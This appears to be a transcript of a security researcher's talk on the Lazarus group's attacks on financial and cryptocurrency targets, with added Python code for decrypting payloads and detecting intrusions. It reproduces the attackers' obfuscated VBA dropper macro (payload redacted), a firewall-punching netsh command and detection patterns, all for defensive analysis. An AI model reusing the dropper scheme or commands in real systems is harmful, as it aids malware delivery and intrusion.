• Recently, they have been changing their TTPs
• Let's keep up with their TTPs
LET’S TALK?
Twitter : @unpacker
Mail : seongsup4rk@gmail.com

AREA41 - Anatomy of attacks aimed at financial sector by the Lazarus group

  • 1. Anatomy of attacks aimed at financial sector by the Lazarus group June 28, 2018 Seongsu Park Senior Security Researcher @ Kaspersky Lab GReAT
  • 2. Who is Lazarus? • Notorious APT group • State-sponsored APT group • Aimed at financial profit and cyber espionage, sabotage LAZARUS Andariel Bluenoroff …… …… Well-known attack case 2013 — DarkSeoul cyber attack 2014 — SPE cyber attack 2016 — Bangladesh bank heist 2017 — WannaCry outbreak
  • 4. About Manuscrypt • From when?  Start to use Manuscrypt from around 2013  Use it actively until recent • Connection?  Many overlap with known Lazarus code style and C&C infrastructure • Attack where?  Usually attacked national intelligence before  Recently, used when attacked financial sector
  • 6. Status of cryptocurrency exchange of Korea World TOP 10 Cryptocurrency Exchanges South Korea company
  • 9. Weaponized hwp HWP file format • Hangul (also known as Hangul Word Processor or HWP) is a proprietary word processing application published by the South Korean company Hancom Inc. -Wikipedia • Used by most government agencies and government offices due to national software activation policy of Government • The South Korea is one of the few countries where MS Word does not rank first Recently, postscript mainly used to deliver payload
  • 10. Decoy and targets Cryptocurrency Any cryptocurrency related news/contents Cryptocurrency market expectation Legal issues Related to lawsuit or audit Forms about legal issues Resume Resume of mainly financial related person Some decoy include victim company name
  • 11. Relationship Last saved user name Author name Malicious hwp
  • 12. Postscript Type #1 — Postscript has asciihex-format executable — Drop file %startup% folder for persistence mechanism — Dropped file is Manuscrypt Direct drop from embedded ascii hex string Creation path (+persistence mechanism) asciihex type payload Asciihex type Manuscrypt Postscript to drop executable Drop and execute Structure
  • 13. Postscript Type #2 — Use Chinese variable name i.e.) yaoshi, yima, yinzi — Decrypt real postscript/shellcode with hardcoded XOR key Has encryption stage with 4-bytes XOR key 4-bytes XOR key Encrypted postscript & Shellcode Postscript to decrypt Decrypt Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Encrypted postscript and shellcode Encrypted Manuscrypt executable
  • 14. Postscript Type #2 – Decrypted data — Decrypted data contains exploit code and shellcode — Trigger the postscript vulnerability and execute shellcode Has encryption stage with 4-bytes XOR key Encrypted postscript & Shellcode Postscript to decrypt Exploit, Decrypt payload and inject Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Shellcode to decrypt payload and inject Heap-spray Exploit code
  • 15. Postscript Type #3-4 — Remove decryption process — Malware author elaborate exploit code Elaborated exploit code Shellcode Postscript Exploit Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Postscript Shellcode Encrypted Manuscrypt Decrypt & Inject
  • 16. Postscript type #5 – add XOR — Same structure with #3 — Add shellcode decryption script with 1-byte XOR Elaborated exploit code Script for decryption of shellcode Shellcode Postscript Decrypt & Exploit Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Postscript Decrypt & Inject
  • 17. Postscript type #6 — Same postscript to trigger vulnerability — No more embedded payload — Shellcode just has download function Change shellcode function Shellcode Postscript Structure Postscript Decrypt & Exploit Download Manuscrypt
  • 18. Change history of hwp attack Type #2 • Start to use postscript vulnerability • Decrypt shellcode and exploitation postscript with 4-bytes XOR • Decrypt payload with 4-bytes XOR key Type #3 • Remove shellcode/postscript decryption routine • Elaborate postscript to trigger vulnerability • Decrypt payload with 4-bytes XOR key Type #4 • Decrypt payload with AES algorithm Type #5 • Add shellcode encryption postscript with 1-byte XOR Type #6 • Change shellcode just download payload Type #1 • Drop embedded asciihex type payload
  • 19. Change history of hwp attack Asciihex type Manuscrypt Postscript to drop executable Drop and execute Structure Encrypted postscript & Shellcode Postscript to decrypt Decrypt Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Shellcode Postscript Exploit Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Postscript Decrypt & Inject Shellcode Postscript Decrypt & Exploit Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Postscript Decrypt & Inject Shellcode Postscript Structure Postscript Decrypt & Exploit Download Manuscrypt Type #1 Type #2 Type #3, 4 Type #5 Type #6 Decrypt & Inject
  • 20. Change history of hwp attack Type #1 Type #6Type #2 Type #5Type #4Type #3 4-bytes XOR Shellcode Decryption 1-bytes XOR 1-bytes XOR Shellcode Triggering CVE-2017-8291 (Ghostscript exploit) Shellcode Type Decrypt embedded payload and inject to legit process Download 4-bytes XOR AES Payload Decryption
  • 21. 21 Attacker vs Defender Type #1 Direct drop from asciihex string 2017-04 2017-06 2017-07 2017-08 2017-09 2017-10 2017-11 2017-12 2018-03 Type #2 Start to use Exploit XORed shellcode + exploit trigger script Type #4 Replace to AES algorithm Type #3 Polishing exploit script 4-bytes XOR decryption Type #6 Download payload from remote server Type #5 Decrypt shellcode with 1-byte XOR ATTACKER SIDE DEFENDER SIDE Detect embedded ascii type executable Detect XOR postscript routine Detect embedded shellcode in postscript Detect embedded encrypted payload
Shellcode comparison across the types
• Different PostScripts, but the same shellcode
• Shared routines: process searching, get handle
Shellcode execution flow
• Get API by hash
• Find decryption key
• Decrypt payload
• Get handle of the target legit process
• Inject into the legit process
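The "find decryption key, decrypt payload" steps above are the ones an analyst has to redo by hand when only the encrypted Manuscrypt blob is available. The following is an added example written for this page, not code from the talk or from the samples: it recovers a 1-byte or 4-byte XOR key (the two key sizes used across the hwp types) from the fixed bytes every PE carries, then validates the result by following e_lfanew to the PE signature. The sample image and the keys are constructed; the DOS stub text offset assumes the standard Microsoft linker stub.

```python
"""Recover a short XOR key from an encrypted embedded PE and decrypt it.

Added example for this page (not the talk's code). Known plaintext used:
"MZ" at offset 0, the zero high bytes of e_lfanew at 0x3E-0x3F, and the
standard DOS stub message at 0x4E (assumption: default MS linker stub).
"""
import struct
from typing import Dict, Optional, Tuple

DOS_STUB_OFFSET = 0x4E
DOS_STUB_TEXT = b"This program cannot be run in DOS mode."


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def known_pe_plaintext() -> Dict[int, int]:
    """Offsets in a PE image whose plaintext is predictable.

    0x00-0x01: "MZ". 0x3E-0x3F: high bytes of e_lfanew, zero in every real PE
    (the NT headers sit within the first 64 KB). 0x4E onward: the DOS stub
    message (drop these offsets if the sample was linked with a custom stub).
    """
    known = {0x00: ord("M"), 0x01: ord("Z"), 0x3E: 0, 0x3F: 0}
    for i, c in enumerate(DOS_STUB_TEXT):
        known[DOS_STUB_OFFSET + i] = c
    return known


def recover_xor_key(cipher: bytes, key_len: int,
                    known: Optional[Dict[int, int]] = None) -> bytes:
    """Derive key[i] from any known-plaintext offset congruent to i mod key_len."""
    known = known if known is not None else known_pe_plaintext()
    key: list = [None] * key_len
    for offset, plain in known.items():
        if offset < len(cipher) and key[offset % key_len] is None:
            key[offset % key_len] = cipher[offset] ^ plain
    if any(k is None for k in key):
        raise ValueError("known plaintext does not cover every key position")
    return bytes(key)


def looks_like_pe(data: bytes) -> bool:
    """Check the DOS magic and that e_lfanew points at the PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def decrypt_embedded_payload(cipher: bytes, key_lengths=(1, 4)) -> Tuple[bytes, bytes]:
    """Try the key lengths seen in the hwp types (1 and 4 bytes); return (key, plaintext)."""
    for n in key_lengths:
        try:
            key = recover_xor_key(cipher, n)
        except ValueError:
            continue
        plain = xor_bytes(cipher, key)
        if looks_like_pe(plain):
            return key, plain
    raise ValueError("no XOR key of the tried lengths yields a valid PE")


def build_sample_pe() -> bytes:
    """Constructed stand-in for an embedded binary: DOS header, stub text, PE signature."""
    image = bytearray(0x100)
    image[0:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, 0x80)          # e_lfanew -> 0x80
    image[DOS_STUB_OFFSET:DOS_STUB_OFFSET + len(DOS_STUB_TEXT)] = DOS_STUB_TEXT
    image[0x80:0x84] = b"PE\0\0"
    return bytes(image)


if __name__ == "__main__":
    sample = build_sample_pe()
    for demo_key in (b"\x13\x37\xca\xfe", b"\xa5"):   # constructed keys
        key, plain = decrypt_embedded_payload(xor_bytes(sample, demo_key))
        print(key.hex(), plain == sample)
```

A 1-byte key is tried first; on a 4-byte-keyed blob it yields "M" at offset 0 but garbage at offset 1, so the PE check rejects it and the 4-byte attempt runs. The same known-plaintext map covers keys up to the length of the stub message, so the key_lengths tuple can be widened if a later variant changes the key size.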
Payload summary
IP-based C&C communication type
• Only used up to Type #2
• Not seen after November 2017
• Fake SSL communication
• Full-featured backdoor: file handling, process handling, execute commands, data exfiltration
HTTP-based C&C communication type
• The usual communication type
• Uses compromised servers
• Full-featured backdoor: system info gathering, execute commands, and so on
Types of C&C servers
COMPROMISED SERVER
— Compromised server
— Direct connection by IP address
— Encrypted channel
COMPROMISED WEB SERVER IN CHINA
— Usually a compromised IIS server
— Attacker uploads PHP scripts
— DedeCMS vulnerability
— WordPress vulnerability
COMPROMISED WEB SERVER IN KOREA
— Usually a compromised IIS server
— Attacker uploads JSP scripts
— Vulnerability in a specific bulletin-board product
— WordPress vulnerability
Not only hwp files
Persistence of the attack: the same decoy was submitted within days as hwp, doc and xls
Time | File name | Source | Country
2017-07-31 07:40:07 | 비트코인_지갑주소_및_거래번호.hwp (Bitcoin_wallet_address_and_transaction_number.hwp) | e3796387 (web) | KR
2017-07-31 16:25:00 | 비트코인_지갑주소_및_거래번호.doc (Bitcoin_wallet_address_and_transaction_number.doc) | e3796387 (web) | KR
2017-08-03 18:13:23 | 비트코인 거래내역.xls (Bitcoin transaction history.xls) | e3796387 (web) | KR
• Decoy of the malicious hwp and decoy of the malicious Word document
Attack methodology
SPEARPHISHING
— Malicious Office document
— Malicious macro embedded
— Decoy: usually a job description or a proposal
Attack methodology: structure of the macro

Macro to create the payload (the file name "sjop/fyf" decodes to rino.exe; the first bytes of str(1), F0 E7 2D BD, XOR 189 give the MZ 90 00 header of a PE):

```vba
Attribute VB_Name = "Module1"
Sub Auto_Open()
On Error GoTo gaqz
' Obfuscated drop name: every character is stored shifted by +1
liveOn = "sjop/fyf"
liveOff = Environ("temp") + "\"
For qnx = 1 To Len(liveOn)
    liveOff = liveOff + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1)
Next
' Payload stored as hex strings of 500 bytes each, every byte XORed with 189 (0xBD)
Dim str(1635) As String
str(1) = "F0E72DBDBEBDBDBD………[redacted]……………DBDBDBD"
.... [redacted]….
str(1635) = "9D9D9D9D9D9D81…. ……[redacted]…..….……DBDBDBD"
Dim offBin(499) As Byte
Open liveOff For Binary Access Write As #1
lpdq = 1
For jnx = 0 To 1634
    For inx = 0 To 499
        offBin(inx) = Val("&H" + Mid(str(jnx + 1), inx * 2 + 1, 2))
        offBin(inx) = offBin(inx) Xor 189
    Next inx
    Put #1, lpdq, offBin
    lpdq = lpdq + 500
Next jnx
Close #1
```

Macro to create the decoy document (the file name "EFG492:2/ymt" decodes to DEF38191.xls; the first bytes of strd(1), 19 06 D8 29, XOR 201 give D0 CF 11 E0, the OLE compound document magic):

```vba
' Same scheme, second key (201 = 0xC9), written to a second file
liveOn = "EFG492:2/ymt"
liveOffd = Environ("temp") + "\"
For qnx = 1 To Len(liveOn)
    liveOffd = liveOffd + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1)
Next qnx
Dim strd(239) As String
strd(1) = "1906D8296878D328C9C9C9…[redacted]…..36363636363636"
...... [redacted]……
strd(239) = "C9C9C9C9C9C9C9C9C9C9…[redacted]…….D9C9C9C9C9C9C9"
Dim offBind(499) As Byte
Open liveOffd For Binary Access Write As #2
lpdq = 1
For jnx = 0 To 238
    For inx = 0 To 499
        offBind(inx) = Val("&H" + Mid(strd(jnx + 1), inx * 2 + 1, 2))
        offBind(inx) = offBind(inx) Xor 201
    Next inx
    Put #2, lpdq, offBind
    lpdq = lpdq + 500
Next jnx
Close #2
```
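To recover the dropped files from a macro of this structure without executing the document, the decoding scheme can be reimplemented outside VBA. The block below is an added example for this page, not the macro's own code: it reproduces the name deobfuscation, the 500-byte chunked hex decoding and the single-byte XOR with the two keys visible in the macro (189 and 201). The hex chunks it decodes are constructed stand-ins for the redacted str()/strd() arrays; only the two obfuscated names and the leading hex bytes are taken from the macro itself.

```python
"""Python re-implementation of the macro's decoding scheme (added example, not the macro)."""
from typing import List

CHUNK_BYTES = 500  # offBin(499) As Byte: the macro writes 500-byte records with Put


def deobfuscate_name(obfuscated: str) -> str:
    """Chr(Asc(c) - 1) per character, as the macro builds liveOff / liveOffd."""
    return "".join(chr(ord(c) - 1) for c in obfuscated)


def vba_hex_byte(chunk: str, index: int) -> int:
    """Emulate Val("&H" + Mid(chunk, index * 2 + 1, 2)); a pair past the end of the string yields 0."""
    pair = chunk[index * 2:index * 2 + 2]
    return int(pair, 16) if pair else 0


def decode_chunks(chunks: List[str], key: int) -> bytes:
    """Rebuild the dropped file exactly as the macro's loop does (500 bytes per chunk, XOR key)."""
    out = bytearray()
    for chunk in chunks:
        for i in range(CHUNK_BYTES):
            out.append(vba_hex_byte(chunk, i) ^ key)
    return bytes(out)


def encode_chunks(data: bytes, key: int) -> List[str]:
    """Inverse of decode_chunks; used here only to build the constructed sample."""
    enc = bytes(b ^ key for b in data)
    return [enc[i:i + CHUNK_BYTES].hex().upper() for i in range(0, len(enc), CHUNK_BYTES)]


PAYLOAD_KEY = 189  # "Xor 189" in the payload loop
DECOY_KEY = 201    # "Xor 201" in the decoy loop

# Constructed stand-in for the redacted str(1..1635): a PE-like header followed by the DOS stub text.
SAMPLE_EXE = b"MZ\x90\x00\x03\x00" + b"\x00" * 700 + b"This program cannot be run in DOS mode."
SAMPLE_EXE_CHUNKS = encode_chunks(SAMPLE_EXE, PAYLOAD_KEY)


if __name__ == "__main__":
    print(deobfuscate_name("sjop/fyf"), deobfuscate_name("EFG492:2/ymt"))
    print(SAMPLE_EXE_CHUNKS[0][:16])                          # F0E72DBDBEBDBDBD, the prefix the macro's str(1) shows
    print(decode_chunks(["1906D829"], DECOY_KEY)[:4].hex())   # d0cf11e0, OLE compound document magic
```

Two details of the VBA loop carry over and are worth knowing when writing detections: the output always has a length that is a multiple of 500, and any bytes past the end of the last hex string come out as the key byte (Val("&H") is 0, and 0 XOR 189 is 189), so a dropped payload from this macro ends in a run of 0xBD bytes rather than zeros.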
Who is the target?
• Finance
• Engineering
• Cryptocurrency
Payload summary: full-featured backdoor, a.k.a. Fallchill
• File search and handling
• Process handling
• Collect system information
• Directory / file listing
• ……
• IP-based C&C communication
 - Fake SSL communication (PolarSSL)
 - Uses compromised servers
• HTTP-based C&C communication
 - Compromised IIS servers hosting ASP
 - Allegedly compromised through board/CMS vulnerabilities
How did I start this investigation?
• A malicious hwp dropped Manuscrypt
• Found one C&C server in South Korea, suspected to be a compromised server
• Worked closely with the investigation agency: investigated the compromised server and found one proxy module
• Expanded the research with our telemetry: YARA magic! Found additional modules from the compromised server
Manuscrypt C2 infrastructure
• Manuscrypt-infected host → sends information → multi-stage proxy servers → communication → final-stage C2 server
Malware/tools from the C&C server
Backdoor variants
• The threat actor uses many kinds of backdoors: active backdoor, passive backdoor, HTTP backdoor, IIS backdoor
Proxy malware
• Main component of the multi-stage proxy structure; forwards incoming traffic to another host
Information harvester
• TCP connection harvester that steals inbound/outbound network connection information
Other tools
• Loader that decrypts and executes an encrypted payload
• File wiper that securely wipes specific files
Proxy module
• Simply forwards traffic from the incoming host to the next hop
Firewall punching
• Adds to the allowed-port list using a Windows command
Fake SSL communication
• Disguised as an SSL handshake with legitimate sites
Configuration
• Stores configuration in a registry key
• Saves configuration as a specific file
• Updates the file with data from another hop
• Decrypts this file when reading it
Proxy module: P2P proxy
• Another infected host: listening named pipe (\\.\pipe\AnonymousPipe)
• Connects to the external named pipe (\\%s\pipe\AnonymousPipe)
• PolarSSL encryption
• Thread #1: receives data from the global P2P server and writes it to the listening named pipe
• Thread #2: reads data from the external named pipe and sends it to the global P2P server
• Global P2P C&C server (passive backdoor module installed)
• P2P-based C&C infrastructure
Active backdoor
• Has the C&C server address and performs backdoor functions
IP-based communications
• Configuration data in a registry key
• Full-featured backdoor: file/directory listing, process handling, get system information, execute Windows commands, send screenshots
HTTP-based communications
• Same configuration data as the IP-based backdoor
• Chooses the HEAD, GET or POST method randomly when communicating with the C&C server
• Full-featured backdoor
Passive backdoor
• Has no C&C server address; opens a port and waits for connections
INSTALLATION PROCESS
• Get the Windows service list and choose one (e.g. the "SharedAccess" service)
• Get the display name of the service and append "Service" (e.g. change the display name "Internet Connection Sharing (ICS)" to "Internet Connection Sharing Service")
• Append decrypted strings to the service display name (e.g. append "is an essential element in Windows System configuration and management.")
• Change the service name to lower case and append "svc" (e.g. SharedAccess -> sharedaccesssvc)
• Drop the payload under the service name (e.g. drop the payload as sharedaccesssvc.dll)
• Change the file timestamp
F/W punching
• cmd.exe /c netsh firewall add portopening TCP [Port] "adp"
Backdoor functions
• Almost the same as the active backdoor
• Some variants have routing functions
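The installation steps above leave a recognisable shape on the host: a service whose name is an existing service name lower-cased with "svc" appended, a display name that is the template's with "Service" appended, the fixed appended sentence in the description, a DLL named after the new service, and a firewall rule opened with the quoted netsh command. The block below is an added example for this page, not tooling from the talk: it turns those indicators into checks over a constructed service inventory (as an EDR or registry export would provide) and constructed process command lines. Dropping the parenthetical "(ICS)" before appending "Service" follows the slide's own example; requiring at least two indicators per service is a tuning choice of this example.

```python
"""Hunt for the passive backdoor installation pattern (added example, not from the talk)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

DESC_TAIL = "is an essential element in Windows System configuration and management."
NETSH_ADP = re.compile(
    r'netsh(?:\.exe)?\s+firewall\s+add\s+portopening\s+TCP\s+(\d+)\s+"adp"', re.IGNORECASE)


@dataclass
class Service:
    name: str
    display_name: str
    description: str
    image_path: str  # the service DLL or EXE as registered


@dataclass
class Finding:
    service: str
    template: str
    indicators: List[str] = field(default_factory=list)


def _strip_parenthetical(text: str) -> str:
    """'Internet Connection Sharing (ICS)' -> 'Internet Connection Sharing'."""
    return re.sub(r"\s*\([^)]*\)", "", text).strip()


def find_cloned_services(services: List[Service], min_indicators: int = 2) -> List[Finding]:
    """Return services that look like a legitimate service's name/display name with 'svc'/'Service' appended."""
    by_name: Dict[str, Service] = {s.name.lower(): s for s in services}
    findings: List[Finding] = []
    for svc in services:
        m = re.fullmatch(r"([a-z0-9_]+)svc", svc.name.lower())
        if not m:
            continue
        template = by_name.get(m.group(1))
        if template is None or template is svc:
            continue
        indicators = ["name is an existing service name lower-cased + 'svc'"]
        if svc.display_name == _strip_parenthetical(template.display_name) + " Service":
            indicators.append("display name is the template display name + 'Service'")
        if svc.description.endswith(DESC_TAIL):
            indicators.append("description ends with the appended sentence")
        basename = svc.image_path.lower().replace("\\", "/").rsplit("/", 1)[-1]
        if basename == svc.name.lower() + ".dll":
            indicators.append("payload file named after the service")
        if len(indicators) >= min_indicators:
            findings.append(Finding(svc.name, template.name, indicators))
    return findings


def find_firewall_punching(command_lines: List[str]) -> List[int]:
    """Return the TCP ports opened with the exact netsh command the backdoor uses."""
    ports = []
    for cmd in command_lines:
        m = NETSH_ADP.search(cmd)
        if m:
            ports.append(int(m.group(1)))
    return ports


# Constructed sample data: one cloned service modelled on the slide's SharedAccess example,
# plus legitimate services and command lines that must not trigger.
SAMPLE_SERVICES = [
    Service("SharedAccess", "Internet Connection Sharing (ICS)",
            "Provides network address translation, addressing and name resolution for a home network.",
            r"C:\Windows\System32\svchost.exe -k netsvcs"),
    Service("sharedaccesssvc", "Internet Connection Sharing Service",
            "Internet Connection Sharing Service " + DESC_TAIL,
            r"C:\Windows\System32\sharedaccesssvc.dll"),
    Service("Spooler", "Print Spooler", "Loads files to memory for later printing.",
            r"C:\Windows\System32\spoolsv.exe"),
    Service("wuauserv", "Windows Update", "Enables the detection, download and installation of updates.",
            r"C:\Windows\System32\svchost.exe -k netsvcs"),
]

SAMPLE_COMMAND_LINES = [
    'cmd.exe /c netsh firewall add portopening TCP 443 "adp"',
    'netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389',
    'cmd.exe /c netsh firewall add portopening TCP 8080 "adp"',
]

if __name__ == "__main__":
    for f in find_cloned_services(SAMPLE_SERVICES):
        print(f.service, "cloned from", f.template, f.indicators)
    print("ports punched:", find_firewall_punching(SAMPLE_COMMAND_LINES))
```

The timestamp change in the last installation step is not covered here because it needs a reference to compare against; on a live host, compare the DLL's modification time with the creation time of its service registry key.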
Other tools
Log wiper
• Generates a random buffer
• Overwrites the file with that data repeatedly
• Deletes the file
TCP connection harvester
• Chooses the proper API depending on the OS version
Malware/tools from the C&C server: where the servers are
• Countries: Indonesia, India, Bangladesh, Malaysia, Vietnam, Korea, Taiwan, Thailand
• Modules found: active backdoor, passive backdoor, proxy, TCP connection harvester, IIS backdoor, HTTP backdoor
Malware/tools from the C&C server: two cases (Case #1, Case #2)
• Countries: India, Colombia, Dominican Republic, Germany, Indonesia, South Korea, Sri Lanka, Panama, Vietnam
• Modules: active backdoor, proxy, HTTP backdoor, passive backdoor, TCP connection harvester
Vulnerability information: fingerprinting of the C&C servers
IP | Web server version | OS fingerprinting
2xx.xx.xx.xxx | N/A | Windows Server 2003 R2
5x.xx.xx.xxx | IIS 6.0 | Aggressive OS guesses: Microsoft Windows Server 2003 (91%), Microsoft Windows Server 2003 SP2 (91%)
2xx.xx.xx.xxx | IIS 6.0 | N/A
1xx.xx.xx.xxx | IIS 6.0 | Aggressive OS guesses: Microsoft Windows 2003 R2 (93%), Microsoft Windows Server 2003 (93%), Microsoft Windows Server 2003 SP2 (93%)
2xx.xx.xx.xxx | IIS 6.0 | Aggressive OS guesses: Microsoft Windows XP SP3 or Windows Server 2003 SP2 (97%), Microsoft Windows Server 2003 SP2 (94%)
1xx.xx.xx.xxx | IIS 6.0 | Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (99%), Microsoft Windows XP SP3 or Windows Server 2003 SP2 (97%), Microsoft Windows Server 2003 SP2 (94%)
2xx.xx.xx.xxx | IIS 6.0 | N/A
2xx.xx.xx.xxx | IIS 6.0 | Aggressive OS guesses: Microsoft Windows Server 2003 SP2 (89%)
5x.xx.xx.xxx | N/A | Aggressive OS guesses: Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows Server 2003 SP1 - SP2 (92%)
Vulnerability information: CVE-2017-7269 timeline
• 2017-03-26: CVE-2017-7269 published
• 2017-03-31: PoC for CVE-2017-7269 added as a Metasploit module
• 2017-04-11: attack tool for this exploit was created
• 2017-06-13: Microsoft published the patch for this vulnerability
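CVE-2017-7269 is a buffer overflow in the WebDAV component of IIS 6.0 (ScStoragePathFromUrl) that is reached through a PROPFIND request carrying an over-long If: header, which is why a fleet of IIS 6.0 / Windows Server 2003 hosts like the ones fingerprinted above made such convenient C&C infrastructure. The block below is an added example for this page, not from the talk: it screens raw HTTP requests (as captured by a reverse proxy, IDS or WAF) for that trigger shape and checks the Server banner for IIS 6.0. The requests are constructed samples, and the 1024-byte threshold is an assumption of this example, not a value from the advisory.

```python
"""Screen raw HTTP requests for the CVE-2017-7269 trigger (added example, not from the talk)."""
from typing import Dict, List, Optional, Tuple

IF_HEADER_THRESHOLD = 1024  # assumption: legitimate WebDAV If: headers hold a few lock tokens, well under 1 KB


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.x request into (method, target, lower-cased headers)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) != 3:
        raise ValueError("malformed request line")
    method, target, _version = parts
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def is_iis6_banner(server_header: Optional[str]) -> bool:
    """True for the Server: banner IIS 6.0 returns."""
    return server_header is not None and server_header.lower().startswith("microsoft-iis/6.0")


def propfind_overflow_candidate(raw: bytes) -> Optional[Dict[str, object]]:
    """Return details when a request is a PROPFIND carrying an If: header longer than the threshold."""
    method, target, headers = parse_request(raw)
    if method.upper() != "PROPFIND":
        return None
    if_value = headers.get("if")
    if if_value is None or len(if_value) < IF_HEADER_THRESHOLD:
        return None
    return {"target": target, "host": headers.get("host", ""), "if_length": len(if_value)}


def screen(requests: List[bytes]) -> List[Dict[str, object]]:
    """Run the check over a batch of raw requests, skipping ones that do not parse."""
    hits = []
    for raw in requests:
        try:
            hit = propfind_overflow_candidate(raw)
        except ValueError:
            continue
        if hit:
            hits.append(hit)
    return hits


# Constructed samples (not captured traffic): a normal WebDAV PROPFIND with a lock token, a GET,
# and a PROPFIND whose If: header carries a resource URL padded far beyond any legitimate length.
BENIGN_PROPFIND = (
    b"PROPFIND /shared/report.docx HTTP/1.1\r\nHost: intranet.example.test\r\n"
    b"If: (<opaquelocktoken:12345678-1234-1234-1234-123456789012>)\r\nDepth: 0\r\n\r\n"
)
BENIGN_GET = b"GET /index.html HTTP/1.1\r\nHost: intranet.example.test\r\n\r\n"
SUSPICIOUS_PROPFIND = (
    b"PROPFIND / HTTP/1.1\r\nHost: intranet.example.test\r\n"
    b"If: <http://localhost/" + b"A" * 2000 + b">\r\n\r\n"
)

if __name__ == "__main__":
    for hit in screen([BENIGN_PROPFIND, BENIGN_GET, SUSPICIOUS_PROPFIND]):
        print("CVE-2017-7269 candidate:", hit)
    print("IIS 6.0 banner:", is_iis6_banner("Microsoft-IIS/6.0"))
```

Default IIS logs do not record the If: header, so this check has to run on request captures rather than on W3C log lines; for IIS 6.0 hosts that cannot be retired, blocking PROPFIND at the edge removes the trigger entirely.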
Let's put them together
• Weaponized hwp/doc → corporate users → victim (Manuscrypt-infected)
• The victim communicates with the multi-stage C&C
• C&C server infrastructure: active backdoor, passive backdoor, proxy module, TCP harvester, ……
• The attacker configures the C&C infrastructure and controls the infected hosts
• Sometimes corporate hosts are infected from the server
Takeaways
• Never let your servers be compromised by them: their C&C infrastructure is built on compromised hosts
• They keep polishing their tools
• Their favorite attack vector is spearphishing
• Recently, they have been changing their TTPs
• Keep your head up and track their TTPs
LET'S TALK?
Twitter: @unpacker
Mail: seongsup4rk@gmail.com